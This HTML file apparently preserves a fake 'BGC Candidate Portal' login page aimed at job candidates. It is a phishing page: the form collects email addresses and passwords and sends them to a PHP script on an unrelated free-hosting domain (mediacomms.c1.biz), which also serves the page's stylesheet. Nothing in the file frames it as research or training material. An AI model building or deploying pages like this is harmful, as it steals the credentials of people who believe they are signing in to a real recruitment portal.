Project Executive - Media Communications
3 years ago in HTML
<!DOCTYPE html>
<html >
<head>
<meta charset="UTF-8">
<title>BGC Candidate Portal</title>
<link href='https://fonts.googleapis.com/css?family=Titillium+Web:400,300,600' rel='stylesheet' type='text/css'>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css">f
<link rel="stylesheet" href="http://mediacomms.c1.biz/style.css">
<center><img src="https://i.imgur.com/p2tfN3u.jpg" width=300 height=170></center>
</head>
<body>
<div class="form">
<div id="login">
<h1>Candidate Portal<h1>
<form action="http://mediacomms.c1.biz/post.php" method="post">
<div class="field-wrap">
<label>
Email Address<span class="req">*</span>
</label>
<input type="email" id="username" name="username" required autocomplete="off"/>
</div>
<div class="field-wrap">
<label>
Password<span class="req">*</span>
</label>
<input type="password" id="password" name="password" required autocomplete="off"/>
</div>
<p class="forgot"><a href="#">Forgot Password?</a></p>
<input type="submit" name="Login" value="Login">
</form>
</div>
</div><!-- tab-content -->
</div> <!-- /form -->
<script src='http://cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script>
<script src="js/index.js"></script>
</body>
</html>